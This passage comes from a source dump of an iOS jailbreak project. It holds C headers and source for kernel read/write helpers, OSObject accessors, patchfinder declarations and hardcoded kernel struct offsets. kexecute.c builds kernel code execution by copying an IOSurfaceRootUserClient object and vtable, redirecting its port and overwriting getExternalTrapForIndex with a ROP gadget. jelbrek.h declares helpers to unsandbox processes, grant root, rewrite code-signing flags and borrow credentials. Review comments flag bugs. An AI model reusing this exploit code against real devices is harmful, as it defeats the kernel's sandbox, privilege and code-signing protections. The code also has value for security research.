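 * LP64 and turn into a zero-byte allocation followed by an out-of-bounds
 * store. The kread() byte count is not checked: a short read leaves the
 * tail of the buffer uninitialised but still terminated.
 */
char *OSString_CopyString(uint64_t osstring){
    unsigned int length = OSString_GetLength(osstring);
    size_t buf_size = (size_t) length + 1;

    char *str = malloc(buf_size);
    if (str == NULL) {
        return NULL;
    }
    str[length] = 0;

    kread(OSString_CStringPtr(osstring), str, length);
    return str;
}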
169 |
--------------------------------------------------------------------------------
/multi_path/jailbreakd/osobject.h:
--------------------------------------------------------------------------------
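// Raw field accessors for libkern OSDictionary/OSArray/OSString layouts.
// The offsets are hardcoded for one kernel build; each macro reads kernel
// memory directly through kread32/kread64, so a stale offset returns garbage
// rather than failing.
// Fix: macro arguments are now parenthesised. Previously
// OSDictionary_ItemKey(buf, i + 1) expanded to kread64(buf+16*i + 1), i.e.
// a misaligned read one byte past the intended entry.
#define OSDictionary_ItemCount(dict) kread32((dict)+20)
#define OSDictionary_ItemBuffer(dict) kread64((dict)+32)
#define OSDictionary_ItemKey(buffer, idx) kread64((buffer)+16*(idx))
#define OSDictionary_ItemValue(buffer, idx) kread64((buffer)+16*(idx)+8)
#define OSString_CStringPtr(str) kread64((str) + 0x10)
#define OSArray_ItemCount(arr) kread32((arr)+0x14)
#define OSArray_ItemBuffer(arr) kread64((arr)+32)

// see osobject.c for info

// All addresses below are kernel addresses; calls go through kexecute().
int OSDictionary_SetItem(uint64_t dict, const char *key, uint64_t val);       // 1 on success, 0 on error
uint64_t OSDictionary_GetItem(uint64_t dict, const char *key);                // fixed-up object address, 0 if absent
int OSDictionary_Merge(uint64_t dict, uint64_t aDict);                        // 1 on success, 0 on error
void OSArray_RemoveObject(uint64_t array, unsigned int idx);
uint64_t OSArray_GetObject(uint64_t array, unsigned int idx);                 // fixed-up object address, 0 if absent
int OSArray_Merge(uint64_t array, uint64_t aArray);                           // 1 on success, 0 on error
uint64_t OSUnserializeXML(const char* buffer);                                // fixed-up object address, 0 on failure

// Reference counting on kernel objects: an unbalanced release frees the
// object under the kernel.
void OSObject_Release(uint64_t osobject);
void OSObject_Retain(uint64_t osobject);
uint32_t OSObject_GetRetainCount(uint64_t osobject);

unsigned int OSString_GetLength(uint64_t osstring);
char *OSString_CopyString(uint64_t osstring);                                 // malloc'd; caller frees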
25 |
--------------------------------------------------------------------------------
/multi_path/jailbreakd/patchfinder64.h:
--------------------------------------------------------------------------------
#ifndef PATCHFINDER64_H_
#define PATCHFINDER64_H_

/*
 * Defines `name` as a memoising wrapper around `__name`: the first call runs
 * the real search, later calls return the cached value. 0 doubles as the
 * "not yet computed" sentinel, so a search that legitimately yields 0 is
 * re-run on every call. The cache is a function-local static with no locking
 * inside the macro itself.
 */
#define CACHED_FIND(type, name) \
type __##name(void);\
type name(void) { \
static type cached = 0; \
if (cached == 0) { \
cached = __##name(); \
} \
return cached; \
} \
type __##name(void)

/* Prepare the kernel image for searching (`base`: kernel load address,
   `filename`: image to read); argument handling lives in patchfinder64.c. */
int init_kernel(uint64_t base, const char *filename);
void term_kernel(void);

// Fun part
// Each returns a kernel address; 0 presumably means "not found" — callers
// should check before using the value (kexecute.c / osobject.c do not).
uint64_t find_allproc(void);
uint64_t find_add_x0_x0_0x40_ret(void);   // `add x0, x0, #0x40; ret` gadget used by init_kexecute()
uint64_t find_OSBoolean_True(void);
uint64_t find_OSBoolean_False(void);
uint64_t find_zone_map_ref(void);
uint64_t find_osunserializexml(void);     // called through kexecute() by _OSUnserializeXML()
uint64_t find_smalloc(void);

#endif
28 |
--------------------------------------------------------------------------------
/multi_path/jelbrek/include/IOKit/OSMessageNotification.h:
--------------------------------------------------------------------------------
1 | /*
2 | * Copyright (c) 1998-2000 Apple Computer, Inc. All rights reserved.
3 | *
4 | * @APPLE_LICENSE_HEADER_START@
5 | *
6 | * This file contains Original Code and/or Modifications of Original Code
7 | * as defined in and that are subject to the Apple Public Source License
8 | * Version 2.0 (the 'License'). You may not use this file except in
9 | * compliance with the License. Please obtain a copy of the License at
10 | * http://www.opensource.apple.com/apsl/ and read it before using this
11 | * file.
12 | *
13 | * The Original Code and all software distributed under the License are
14 | * distributed on an 'AS IS' basis, WITHOUT WARRANTY OF ANY KIND, EITHER
15 | * EXPRESS OR IMPLIED, AND APPLE HEREBY DISCLAIMS ALL SUCH WARRANTIES,
16 | * INCLUDING WITHOUT LIMITATION, ANY WARRANTIES OF MERCHANTABILITY,
17 | * FITNESS FOR A PARTICULAR PURPOSE, QUIET ENJOYMENT OR NON-INFRINGEMENT.
18 | * Please see the License for the specific language governing rights and
19 | * limitations under the License.
20 | *
21 | * @APPLE_LICENSE_HEADER_END@
22 | */
23 | /*
24 | * Copyright (c) 1999 Apple Computer, Inc. All rights reserved.
25 | *
26 | * HISTORY
27 | *
28 | */
29 |
30 | #ifndef __OS_OSMESSAGENOTIFICATION_H
31 | #define __OS_OSMESSAGENOTIFICATION_H
32 |
33 | #ifdef __cplusplus
34 | extern "C" {
35 | #endif
36 |
37 | #include
38 | #include "IOReturn.h"
39 |
/* IOKit notification type codes carried in OSNotificationHeader.type. */
enum {
    kFirstIOKitNotificationType = 100,
    kIOServicePublishNotificationType = 100,
    kIOServiceMatchedNotificationType = 101,
    kIOServiceTerminatedNotificationType = 102,
    kIOAsyncCompletionNotificationType = 150,
    kIOServiceMessageNotificationType = 160,
    kLastIOKitNotificationType = 199
};

/* Message IDs for notification / async-completion messages, and the maximum
   number of arguments an async completion carries. */
enum {
    kOSNotificationMessageID = 53,
    kOSAsyncCompleteMessageID = 57,
    kMaxAsyncArgs = 16
};

/* Slot layout of an OSAsyncReference: slot 0 is reserved; the callout
   function and refcon (plus, for interest callouts, the service) follow.
   The three *CalloutFuncIndex enumerators all alias kIOAsyncReservedCount. */
enum {
    kIOAsyncReservedIndex = 0,
    kIOAsyncReservedCount,

    kIOAsyncCalloutFuncIndex = kIOAsyncReservedCount,
    kIOAsyncCalloutRefconIndex,
    kIOAsyncCalloutCount,

    kIOMatchingCalloutFuncIndex = kIOAsyncReservedCount,
    kIOMatchingCalloutRefconIndex,
    kIOMatchingCalloutCount,

    kIOInterestCalloutFuncIndex = kIOAsyncReservedCount,
    kIOInterestCalloutRefconIndex,
    kIOInterestCalloutServiceIndex,
    kIOInterestCalloutCount
};

/* An async reference is kOSAsyncRefCount natural_t slots; kOSAsyncRefSize is
   its size in bytes (presumably 8 * sizeof(natural_t) — confirm). */
enum {
    kOSAsyncRefCount = 8,
    kOSAsyncRefSize = 32
};
typedef natural_t OSAsyncReference[kOSAsyncRefCount];
79 |
/* Fixed header at the front of an IOKit notification message; `content` is a
   variable-length payload of `size` bytes whose layout depends on `type`
   (see the *Content structs below). */
struct OSNotificationHeader {
    vm_size_t size; /* content size */
    natural_t type; /* one of the k*NotificationType values above */
    OSAsyncReference reference;

#if defined(__STDC_VERSION__) && (__STDC_VERSION__ >= 199901L)
    unsigned char content[]; /* C99 flexible array member */
#else
    unsigned char content[0]; /* pre-C99 zero-length-array idiom */
#endif
};
91 |
/* Payload of a service-interest notification: a message type plus a
   variable number of arguments (declared as one; the rest follow in the
   message). */
struct IOServiceInterestContent {
    natural_t messageType;
    void * messageArgument[1];
};
96 |
/* Payload of an async-completion notification: the IOReturn result followed
   by up to kMaxAsyncArgs argument words. */
struct IOAsyncCompletionContent {
    IOReturn result;
#if defined(__STDC_VERSION__) && (__STDC_VERSION__ >= 199901L)
    void * args[]; /* C99 flexible array member */
#else
    void * args[0]; /* pre-C99 zero-length-array idiom */
#endif
};
105 |
/* C-only convenience typedefs so the structs can be named without `struct`. */
#ifndef __cplusplus
typedef struct OSNotificationHeader OSNotificationHeader;
typedef struct IOServiceInterestContent IOServiceInterestContent;
typedef struct IOAsyncCompletionContent IOAsyncCompletionContent;
#endif
111 |
112 | #ifdef __cplusplus
113 | }
114 | #endif
115 |
116 | #endif /* __OS_OSMESSAGENOTIFICATION_H */
117 |
118 |
--------------------------------------------------------------------------------
/multi_path/jelbrek/include/IOKit/Readme.md:
--------------------------------------------------------------------------------
1 | IOKit for iOS SDK7.0
2 | =======
3 |
4 | 
5 |
6 | 在某些时候可能会用到IOKit来获取一些信息,但是将sdk从6.x升级到7.0的sdk之后就会发现那个libIOKit.dylib找不到了。网上的办法是将6.x的sdk复制到7.0的sdk下,或者创建一个符号链接。
7 |
8 | 其实还有另外一个解决办法:在7.0之后这个东西不再是dylib了,而是成了一个framework,位于这个目录下
9 |
10 | /Applications/Xcode.app/Contents/Developer/Platforms/iPhoneOS.platform/Developer/SDKs/iPhoneOS7.0.sdk/System/Library/Frameworks/IOKit.framework,所以只需要将工程中的iokit用framework替换掉就可以了。另外这个framework并没有头文件,如果要用也得自己去提取相关的头文件,可以用class-dump来生成。我用的是apple xnu中的头文件,效果是一样的,这里整理了一下,需要的直接放入工程目录下引入IOKitLib.h就可以了。
--------------------------------------------------------------------------------
/multi_path/jelbrek/include/IOKit/screenshot.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/jelbrek/include/IOKit/screenshot.jpg
--------------------------------------------------------------------------------
/multi_path/jelbrek/inject_criticald.h:
--------------------------------------------------------------------------------
/* Load `loaded_dylib` into the process `pid` (by name; the mechanism lives in
   the implementation, not visible here). Return value semantics: see there. */
int inject_dylib(pid_t pid, char *loaded_dylib);
/* Main-executable load address of the task behind task port `tp`. */
uint64_t binary_load_address(mach_port_t tp);
3 |
--------------------------------------------------------------------------------
/multi_path/jelbrek/jelbrek.h:
--------------------------------------------------------------------------------
1 | #include "QiLin.h"
2 |
/*
 * Post-exploitation primitives. The comments are based on the names only;
 * the actual behaviour is in the implementation, which is not visible here.
 * Everything after init_jelbrek() presumably works by rewriting kernel
 * structures through the tfp0 port it was given.
 */
void init_jelbrek(mach_port_t tfp0, uint64_t kernel_base);                 // must run first: records tfp0 + kernel base
kern_return_t trust_bin(const char *path);                                  // by name: mark the binary at `path` as trusted
BOOL unsandbox(pid_t pid);                                                  // by name: remove the sandbox from `pid`
void setcsflags(pid_t pid);                                                 // by name: rewrite `pid`'s code-signing flags
BOOL get_root(pid_t pid);                                                   // by name: give `pid` root credentials
void remount1126(void);                                                     // by name: root-fs remount, 11.2.6 variant
void mountDevAtPathAsRW(const char* devpath, const char* path);
void remount1131(void);                                                     // by name: root-fs remount, 11.3.1 variant
void platformize(pid_t pid);                                                // by name: give `pid` platform-binary status
void entitlePid(pid_t pid, const char *ent1, _Bool val1);                   // by name: set boolean entitlement `ent1` on `pid`
int launch(char *binary, char *arg1, char *arg2, char *arg3, char *arg4, char *arg5, char *arg6, char**env);
int launchAsPlatform(char *binary, char *arg1, char *arg2, char *arg3, char *arg4, char *arg5, char *arg6, char**env);
void undoCredDonation(uint64_t selfcred);                                   // restore the ucred saved by a borrowCredsFrom*() call
uint64_t borrowCredsFromPid(pid_t donor);                                   // by name: adopt `donor`'s ucred; returns a value for undoCredDonation()
uint64_t borrowCredsFromDonor(char *binary);
18 |
19 |
--------------------------------------------------------------------------------
/multi_path/jelbrek/kern_utils.h:
--------------------------------------------------------------------------------
1 | //
2 | // fun_utils.h
3 | // async_wake_ios
4 | //
5 | // Created by George on 18/12/17.
6 | // Copyright © 2017 Ian Beer. All rights reserved.
7 | //
8 |
9 | #ifndef fun_utils_h
10 | #define fun_utils_h
11 |
12 | #include
13 | #include
14 | #include
15 | #include
16 | #include
17 | #include
18 | #include
19 | #include
20 | #include
21 | #include
22 |
// Needed definitions (mach/mach_vm.h is not shipped in the iOS SDK, so the
// mach_vm_* entry points are redeclared here by hand).
kern_return_t mach_vm_allocate(vm_map_t target, mach_vm_address_t *address, mach_vm_size_t size, int flags);
kern_return_t mach_vm_read_overwrite(vm_map_t target_task, mach_vm_address_t address, mach_vm_size_t size, mach_vm_address_t data, mach_vm_size_t *outsize);
kern_return_t mach_vm_write(vm_map_t target_task, mach_vm_address_t address, vm_offset_t data, mach_msg_type_number_t dataCnt);
// NOTE(review): mach/mach_vm.h declares the second parameter as
// `mach_vm_address_t address` (by value), not a pointer. With this prototype
// a caller passing `&addr` hands the kernel the address of a userland local
// instead of the region to free. Check kfree() in kern_utils.c against the
// real ABI before trusting deallocations made through this declaration.
kern_return_t mach_vm_deallocate(vm_map_t target, mach_vm_address_t *address, mach_vm_size_t size);

// "General" purpose
uint8_t *get_sha256(uint8_t* code_dir);           // digest of a code directory blob (ownership of the result: see implementation)
uint8_t *get_code_directory(const char* name);    // code directory blob of the binary at `name`
int cp(const char *from, const char *to);
int file_exist(char *filename);

// Kernel utility stuff — all addresses are kernel addresses reached through
// the tfp0 port given to init_kernel_utils(); there is no validation of them.
void init_kernel_utils(mach_port_t tfp0);
uint64_t kalloc(vm_size_t size);
void kfree(mach_vm_address_t address, vm_size_t size);
size_t kread(uint64_t where, void *p, size_t size);   // returns a size_t — presumably bytes read; confirm before checking it
uint32_t kread32(uint64_t where);
uint64_t kread64(uint64_t where);
size_t kwrite(uint64_t where, const void *p, size_t size);
void kwrite32(uint64_t where, uint32_t what);
void kwrite64(uint64_t where, uint64_t what);
void kmemcpy(uint64_t dest, uint64_t src, uint32_t length);
mach_port_t fake_host_priv(void);
uint64_t zm_fix_addr(uint64_t addr);                  // rebuild a full kernel pointer from the 32 bits a trap returns (see osobject.c callers)
uint64_t proc_for_pid(pid_t pid);
uint64_t proc_for_name(char *nm);
unsigned int pid_for_name(char *nm);
uint64_t find_port_address(mach_port_name_t port);    // kernel address of the ipc_port behind a port name in our task
uint64_t task_self_addr(void);
uint64_t kmem_alloc_wired(uint64_t size);
uint64_t find_kernproc(void);
uint64_t find_kernel_base(void);
uint64_t getVnodeAtPath(const char *path);
57 | #endif /* fun_utils_h */
58 |
--------------------------------------------------------------------------------
/multi_path/jelbrek/kexecute.c:
--------------------------------------------------------------------------------
1 |
2 | #include
3 | #include "kern_utils.h"
4 | #include "kexecute.h"
5 | #include "patchfinder64.h"
6 | #include "offsetof.h"
7 | #include
8 |
/*
 * Open a user client on the IOSurfaceRoot service and return its connection
 * port. Both failure paths are fatal: a message goes to stdout and the
 * process exits with EXIT_FAILURE.
 *
 * NOTE(review): the io_service_t from IOServiceGetMatchingService is never
 * released once the connection exists; consider IOObjectRelease(service)
 * after a successful IOServiceOpen.
 */
mach_port_t prepare_user_client(void) {
    io_service_t surface_root = IOServiceGetMatchingService(kIOMasterPortDefault,
                                                            IOServiceMatching("IOSurfaceRoot"));
    if (surface_root == IO_OBJECT_NULL) {
        printf(" [-] unable to find service\n");
        exit(EXIT_FAILURE);
    }

    mach_port_t connection = 0;
    kern_return_t kr = IOServiceOpen(surface_root, mach_task_self(), 0, &connection);
    if (kr != KERN_SUCCESS) {
        printf(" [-] unable to get user client connection\n");
        exit(EXIT_FAILURE);
    }

    printf("got user client: 0x%x\n", connection);
    return connection;
}
30 |
31 | // TODO: Consider removing this - jailbreakd runs all kernel ops on the main thread
pthread_mutex_t kexecute_lock;                 // serialises kexecute(): the trap slot in fake_client is shared state
static mach_port_t user_client;                // IOSurfaceRootUserClient connection from prepare_user_client()
static uint64_t IOSurfaceRootUserClient_port;  // kernel address of that connection's ipc_port
static uint64_t IOSurfaceRootUserClient_addr;  // kernel address of the genuine C++ user client (the port's ip_kobject)
static uint64_t fake_vtable;                   // kalloc'd copy of the client's vtable, one slot patched
static uint64_t fake_client;                   // kalloc'd copy of the client object, pointed at fake_vtable
const int fake_kalloc_size = 0x1000;           // size of each copy; init_kexecute copies 0x200 * 8 bytes into each
39 |
/*
 * Build the kernel code-execution primitive used by kexecute().
 *
 * Steps, in the order the code performs them (the live port is only
 * redirected once both copies are complete):
 *  1. open an IOSurfaceRootUserClient and locate its ipc_port, the C++
 *     object behind it (ip_kobject) and that object's vtable;
 *  2. kalloc() a 0x1000-byte buffer and copy 0x200 pointer-sized entries of
 *     the vtable into it;
 *  3. kalloc() a second 0x1000-byte buffer, copy 0x200 entries of the user
 *     client object into it, and point the copy's vtable pointer at the
 *     copied vtable;
 *  4. swap the port's ip_kobject to the fake object;
 *  5. overwrite vtable slot 0xB7 (IOUserClient::getExternalTrapForIndex) in
 *     the fake vtable with an `add x0, x0, #0x40; ret` gadget, so trap lookups
 *     return fake_client+0x40 as the IOExternalTrap (see kexecute()).
 *
 * The 0x200-entry copies are a fixed size, not the real vtable/object sizes;
 * the tail of each copy is whatever followed the original in kernel memory.
 * Nothing here checks that kalloc() or find_add_x0_x0_0x40_ret() returned a
 * non-zero address — a 0 would be written straight into the live port or the
 * vtable slot.
 */
void init_kexecute(void) {
    user_client = prepare_user_client();

    // From v0rtex - get the IOSurfaceRootUserClient port, and then the address of the actual client, and vtable
    IOSurfaceRootUserClient_port = find_port_address(user_client); // UserClients are just mach_ports, so we find its address
    printf("Found port: 0x%llx\n", IOSurfaceRootUserClient_port);

    IOSurfaceRootUserClient_addr = kread64(IOSurfaceRootUserClient_port + offsetof_ip_kobject); // The UserClient itself (the C++ object) is at the kobject field
    printf("Found addr: 0x%llx\n", IOSurfaceRootUserClient_addr);

    uint64_t IOSurfaceRootUserClient_vtab = kread64(IOSurfaceRootUserClient_addr); // vtables in C++ are at *object
    printf("Found vtab: 0x%llx\n", IOSurfaceRootUserClient_vtab);

    // The aim is to create a fake client, with a fake vtable, and overwrite the existing client with the fake one
    // Once we do that, we can use IOConnectTrap6 to call functions in the kernel as the kernel

    // Create the vtable in the kernel memory, then copy the existing vtable into there
    fake_vtable = kalloc(fake_kalloc_size);
    printf("Created fake_vtable at %016llx\n", fake_vtable);

    // 0x200 entries * 8 bytes = exactly fake_kalloc_size.
    for (int i = 0; i < 0x200; i++) {
        kwrite64(fake_vtable+i*8, kread64(IOSurfaceRootUserClient_vtab+i*8));
    }

    printf("Copied some of the vtable over\n");

    // Create the fake user client
    fake_client = kalloc(fake_kalloc_size);
    printf("Created fake_client at %016llx\n", fake_client);

    for (int i = 0; i < 0x200; i++) {
        kwrite64(fake_client+i*8, kread64(IOSurfaceRootUserClient_addr+i*8));
    }

    printf("Copied the user client over\n");

    // Write our fake vtable into the fake user client
    kwrite64(fake_client, fake_vtable);

    // Replace the user client with ours
    kwrite64(IOSurfaceRootUserClient_port + offsetof_ip_kobject, fake_client);

    // Now the userclient port we have will look into our fake user client rather than the old one

    // Replace IOUserClient::getExternalTrapForIndex with our ROP gadget (add x0, x0, #0x40; ret;)
    kwrite64(fake_vtable+8*0xB7, find_add_x0_x0_0x40_ret());

    // NOTE(review): no trailing "\n" — this runs into the next line of output.
    printf("Wrote the `add x0, x0, #0x40; ret;` gadget over getExternalTrapForIndex");

    // Initialised last; kexecute() must not be called before this returns.
    pthread_mutex_init(&kexecute_lock, NULL);
}
100 |
/*
 * Undo init_kexecute(): point the IOSurfaceRootUserClient port's kobject back
 * at the genuine client object, then release the two kernel allocations that
 * held the fake client and its vtable. The kobject is restored first so the
 * live port never references freed memory. kexecute_lock is left as is.
 */
void term_kexecute(void) {
    kwrite64(IOSurfaceRootUserClient_port + offsetof_ip_kobject,
             IOSurfaceRootUserClient_addr);

    // Same order as before: vtable copy, then object copy.
    uint64_t allocations[] = { fake_vtable, fake_client };
    for (size_t i = 0; i < sizeof(allocations) / sizeof(allocations[0]); i++) {
        kfree(allocations[i], fake_kalloc_size);
    }
}
106 |
/*
 * Call an arbitrary kernel function with kernel privileges.
 *
 * Mechanism (set up by init_kexecute): IOConnectTrap6 -> iokit_user_client_trap
 * -> IOUserClient::getTargetAndTrapForIndex -> getExternalTrapForIndex. The
 * last one is our `add x0, x0, #0x40; ret` gadget, so the kernel takes the
 * IOExternalTrap for index 0 from fake_client+0x40. That trap is
 * {object, func}, and the kernel calls func(object, x1..x6) — i.e. the
 * first argument of whatever we call is the object (`this`), the rest pass
 * through unchanged. We therefore stage x0 as the trap's object and addr as
 * its function, fire the trap, and put the previous 16 bytes back (the
 * restore is probably not strictly needed, but it is cheap).
 *
 * @param addr   kernel address to call
 * @param x0     first argument (becomes x0/`this` of the callee)
 * @param x1..x6 remaining arguments, passed through IOConnectTrap6
 * @return the trap's return as seen from userland. IOConnectTrap6 returns a
 *         kern_return_t, so only the low 32 bits of the callee's result come
 *         back, widened (sign-extended) to uint64_t; callers expecting a
 *         pointer must rebuild the upper half (see zm_fix_addr in osobject.c).
 *
 * Serialised with kexecute_lock because the trap slots in fake_client are
 * shared state.
 */
uint64_t kexecute(uint64_t addr, uint64_t x0, uint64_t x1, uint64_t x2, uint64_t x3, uint64_t x4, uint64_t x5, uint64_t x6) {
    pthread_mutex_lock(&kexecute_lock);

    const uint64_t trap_object_slot = fake_client + 0x40;
    const uint64_t trap_func_slot = fake_client + 0x48;

    // Save whatever currently occupies the trap slots.
    uint64_t saved_object = kread64(trap_object_slot);
    uint64_t saved_func = kread64(trap_func_slot);

    // Install {x0, addr} as the IOExternalTrap and invoke it.
    kwrite64(trap_object_slot, x0);
    kwrite64(trap_func_slot, addr);
    uint64_t result = IOConnectTrap6(user_client, 0, x1, x2, x3, x4, x5, x6);

    // Restore the slots whatever the callee returned.
    kwrite64(trap_object_slot, saved_object);
    kwrite64(trap_func_slot, saved_func);

    pthread_mutex_unlock(&kexecute_lock);
    return result;
}
132 |
--------------------------------------------------------------------------------
/multi_path/jelbrek/kexecute.h:
--------------------------------------------------------------------------------
1 | #include
2 | #include
3 |
/* Call kernel function `addr` as addr(x0, x1, ..., x6) with kernel privileges
   via the patched IOSurfaceRootUserClient trap (see kexecute.c). Only the
   low 32 bits of the callee's result are returned. init_kexecute() must have
   run first; term_kexecute() restores the port and frees the fake objects. */
uint64_t kexecute(uint64_t addr, uint64_t x0, uint64_t x1, uint64_t x2, uint64_t x3, uint64_t x4, uint64_t x5, uint64_t x6);
void init_kexecute(void);
void term_kexecute(void);
7 |
--------------------------------------------------------------------------------
/multi_path/jelbrek/libjb.h:
--------------------------------------------------------------------------------
1 | #include
2 |
3 | #ifndef libjb_h_included
4 | #define libjb_h_included
5 |
6 |
7 |
8 | /* libhfs *******************************************************************/
9 |
/* Bits of the `flags` word presumably filled in by HFSGetDirEntry(): a
   9-bit POSIX permission mask, an owner-is-not-root bit, and a 2-bit file
   type in bits 16-17. */
enum {
    kPermOtherExecute = 1 << 0,
    kPermOtherWrite = 1 << 1,
    kPermOtherRead = 1 << 2,
    kPermGroupExecute = 1 << 3,
    kPermGroupWrite = 1 << 4,
    kPermGroupRead = 1 << 5,
    kPermOwnerExecute = 1 << 6,
    kPermOwnerWrite = 1 << 7,
    kPermOwnerRead = 1 << 8,
    kPermMask = 0x1FF,
    kOwnerNotRoot = 1 << 9,
    kFileTypeUnknown = 0x0 << 16,
    kFileTypeFlat = 0x1 << 16,
    kFileTypeDirectory = 0x2 << 16,
    kFileTypeLink = 0x3 << 16,
    kFileTypeMask = 0x3 << 16
};
28 |
typedef long CICell; /* opaque handle returned by HFSOpen() */

extern char *gLoadAddr; /* buffer of size 32MB (max file size) */

/* Minimal HFS volume access. */
CICell HFSOpen(const char *filename, long offset);
long HFSReadFile(CICell ih, char *filePath, void *base, unsigned long offset, unsigned long length);
long HFSGetDirEntry(CICell ih, char *dirPath, unsigned long *dirIndex, char **name, long *flags, long *time);
void HFSClose(CICell);

/* untar ********************************************************************/

/* untar 'a' to current directory. path is name of archive (informational) */
/* NOTE(review): extracts into the cwd; whether member paths are checked for
   `..` or absolute components is not visible here — confirm before feeding
   it an archive that did not ship with this tool. */
void untar(FILE *a, const char *path);

/* launchctl ****************************************************************/

int launchctl_load_cmd(const char *filename, int do_load, int opt_force, int opt_write);
46 |
47 | /* hashes *******************************************************************/
48 |
/* Header of a trust-cache blob as stored on disk (presumably, from the name):
 * a version, the cache UUID and the number of hash entries. The entries
 * themselves follow the header (the commented-out flexible member) and are
 * not part of this struct. Packed so the layout matches the serialized bytes. */
struct trust_dsk {
    unsigned int version;
    unsigned char uuid[16];
    unsigned int count;          /* number of hash entries following the header */
    //unsigned char data[];
} __attribute__((packed));
55 |
/* In-memory (kernel) form of the trust-cache header: instead of a version it
 * starts with a kernel pointer to the next element of the chain, stored as a
 * uint64_t because this struct is read out of kernel memory, not dereferenced
 * locally. Remaining fields as in struct trust_dsk. */
struct trust_mem {
    uint64_t next; //struct trust_mem *next;
    unsigned char uuid[16];
    unsigned int count;          /* number of hash entries following the header */
    //unsigned char data[];
} __attribute__((packed));
62 |
/* Entry of the amfitab lookup table (see the extern below).
 * NOTE(review): field meaning is not established in this header — presumably
 * 'start' indexes into allhash and 'num' counts entries; confirm against grab_hashes(). */
struct hash_entry_t {
    uint16_t num;
    uint16_t start;
} __attribute__((packed));
67 |
68 | typedef uint8_t hash_t[20];
69 |
70 | extern hash_t *allhash;
71 | extern unsigned numhash;
72 | extern struct hash_entry_t *amfitab;
73 | extern hash_t *allkern;
74 |
75 | /* can be called multiple times. kernel read func & amfi/top trust chain block are optional */
76 | int grab_hashes(const char *root, size_t (*kread)(uint64_t, void *, size_t), uint64_t amfi, uint64_t top);
77 |
78 | #endif
79 |
--------------------------------------------------------------------------------
/multi_path/jelbrek/offsetof.c:
--------------------------------------------------------------------------------
// Hard-coded kernel struct field offsets used by the jelbrek helpers.
// They are plain globals, so a caller could override them at runtime, but no
// validation of them is visible in this file: a wrong value silently reads or
// writes the wrong kernel field. Each comment names the XNU struct::field.
unsigned offsetof_p_pid = 0x10; // proc_t::p_pid
unsigned offsetof_task = 0x18; // proc_t::task
unsigned offsetof_p_uid = 0x30; // proc_t::p_uid
unsigned offsetof_p_gid = 0x34; // proc_t::p_gid
unsigned offsetof_p_ruid = 0x38; // proc_t::p_ruid
unsigned offsetof_p_rgid = 0x3c; // proc_t::p_rgid
unsigned offsetof_p_ucred = 0x100; // proc_t::p_ucred
unsigned offsetof_p_csflags = 0x2a8; // proc_t::p_csflags
unsigned offsetof_itk_self = 0xD8; // task_t::itk_self (convert_task_to_port)
unsigned offsetof_itk_sself = 0xE8; // task_t::itk_sself (task_get_special_port)
unsigned offsetof_itk_bootstrap = 0x2b8; // task_t::itk_bootstrap (task_get_special_port)
unsigned offsetof_itk_space = 0x308; // task_t::itk_space
unsigned offsetof_ip_mscount = 0x9C; // ipc_port_t::ip_mscount (ipc_port_make_send)
unsigned offsetof_ip_srights = 0xA0; // ipc_port_t::ip_srights (ipc_port_make_send)
unsigned offsetof_ip_kobject = 0x68; // ipc_port_t::ip_kobject
unsigned offsetof_p_textvp = 0x248; // proc_t::p_textvp
unsigned offsetof_p_textoff = 0x250; // proc_t::p_textoff
unsigned offsetof_p_cputype = 0x2c0; // proc_t::p_cputype
unsigned offsetof_p_cpu_subtype = 0x2c4; // proc_t::p_cpu_subtype
unsigned offsetof_special = 2 * sizeof(long); // host::special (the only entry computed rather than hard-coded)
unsigned offsetof_ipc_space_is_table = 0x20; // ipc_space::is_table?..

unsigned offsetof_ucred_cr_uid = 0x18; // ucred::cr_uid
unsigned offsetof_ucred_cr_ruid = 0x1c; // ucred::cr_ruid
unsigned offsetof_ucred_cr_svuid = 0x20; // ucred::cr_svuid
unsigned offsetof_ucred_cr_ngroups = 0x24; // ucred::cr_ngroups
unsigned offsetof_ucred_cr_groups = 0x28; // ucred::cr_groups
unsigned offsetof_ucred_cr_rgid = 0x68; // ucred::cr_rgid
unsigned offsetof_ucred_cr_svgid = 0x6c; // ucred::cr_svgid

unsigned offsetof_v_type = 0x70; // vnode::v_type
unsigned offsetof_v_id = 0x74; // vnode::v_id
unsigned offsetof_v_ubcinfo = 0x78; // vnode::v_ubcinfo

unsigned offsetof_ubcinfo_csblobs = 0x50; // ubc_info::csblobs

unsigned offsetof_csb_cputype = 0x8; // cs_blob::csb_cputype
unsigned offsetof_csb_flags = 0x12; // cs_blob::csb_flags
unsigned offsetof_csb_base_offset = 0x16; // cs_blob::csb_base_offset
unsigned offsetof_csb_entitlements_offset = 0x98; // cs_blob::csb_entitlements
unsigned offsetof_csb_signer_type = 0xA0; // cs_blob::csb_signer_type
unsigned offsetof_csb_platform_binary = 0xA4; // cs_blob::csb_platform_binary
unsigned offsetof_csb_platform_path = 0xA8; // cs_blob::csb_platform_path

unsigned offsetof_t_flags = 0x3a0; // task::t_flags

unsigned offsetof_v_mount = 0xd8; // vnode::v_mount
unsigned offsetof_v_specinfo = 0x78; // vnode::v_specinfo (same offset as v_ubcinfo above)
unsigned offsetof_specflags = 0x10; // NOTE(review): owning struct not named; presumably a field of the specinfo pointed to by v_specinfo — confirm
unsigned offsetof_mnt_flag = 0x70; // mount::mnt_flag
unsigned offsetof_mnt_data = 0x8f8; // mount::mnt_data
52 |
53 |
--------------------------------------------------------------------------------
/multi_path/jelbrek/offsetof.h:
--------------------------------------------------------------------------------
1 |
// Declarations for the offset globals defined in offsetof.c (see the comments
// there for the struct::field each one denotes).
// NOTE(review): this header has no include guard; harmless for extern
// declarations and identical #defines, but worth adding.
extern unsigned offsetof_p_pid;
extern unsigned offsetof_task;
extern unsigned offsetof_p_uid;
extern unsigned offsetof_p_gid;
extern unsigned offsetof_p_ruid;
extern unsigned offsetof_p_rgid;
extern unsigned offsetof_p_ucred;
extern unsigned offsetof_p_csflags;
extern unsigned offsetof_itk_self;
extern unsigned offsetof_itk_sself;
extern unsigned offsetof_itk_bootstrap;
extern unsigned offsetof_itk_space;
extern unsigned offsetof_ip_mscount;
extern unsigned offsetof_ip_srights;
extern unsigned offsetof_ip_kobject;
extern unsigned offsetof_p_textvp;
extern unsigned offsetof_p_textoff;
extern unsigned offsetof_p_cputype;
extern unsigned offsetof_p_cpu_subtype;
extern unsigned offsetof_special;
extern unsigned offsetof_ipc_space_is_table;

extern unsigned offsetof_ucred_cr_uid;
extern unsigned offsetof_ucred_cr_ruid;
// NOTE(review): offsetof_ucred_cr_gid is declared here but offsetof.c defines
